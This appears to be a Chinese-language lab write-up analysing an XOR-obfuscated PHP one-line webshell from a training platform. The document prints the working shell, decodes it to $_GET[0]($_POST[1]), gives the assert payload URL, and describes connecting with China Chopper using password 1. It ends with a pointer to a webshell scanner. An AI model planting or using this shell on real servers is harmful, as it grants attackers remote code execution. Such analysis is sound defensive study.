WebShell代码分析溯源(四)

WebShell代码分析溯源(四)

一、一句话变形马样本

<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

二、代码分析

1、调整代码格式

　　

2、分析代码

“^”为异或运算符,在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或运算,异或运算完，又将结果从二进制转换成了字符串。

$_++,这行代码的意思是对变量名为”_”的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下，通过对未定义变量的自增操作来得到一个数字。

2.1手动进行异或运算，依次类推得到$___=_POST

　　

2.2$_++在自增之后，$_就变成了1，因此，!$_也就为0，综上分析，${$__}[!$_](${$___}[$_]);也就变成了$_GET[0]($_POST[1]);，此时一句话木马为<?php $_GET[0]($_POST[1]); ?>

2.3构造payload: http://www.test.com/test.php?0=assert，因此一句话木马就变成为<?php  assert($_POST[1]); ?>，然后使用菜刀连接，密码为1

2.4远程代码执行，执行一些命令

　　

　　

3、通过调试代码进行分析webshell,搭建php环境(这里使用phpstudy)

　　

4、调试输出结果如下

　　

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(PHP代码分析溯源(第1题))，地址: https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe

2、代码环境，下载代码

　　

3、分析(上面已经分析过了)

4、使用菜刀连接

　　

四、后记

学习常用webshell扫描检测查杀工具---WEBDIR+(百度WebShell扫描检测引擎),网址: https://scanner.baidu.com/#/pages/intro

使用WEBDIR+进行webshell查杀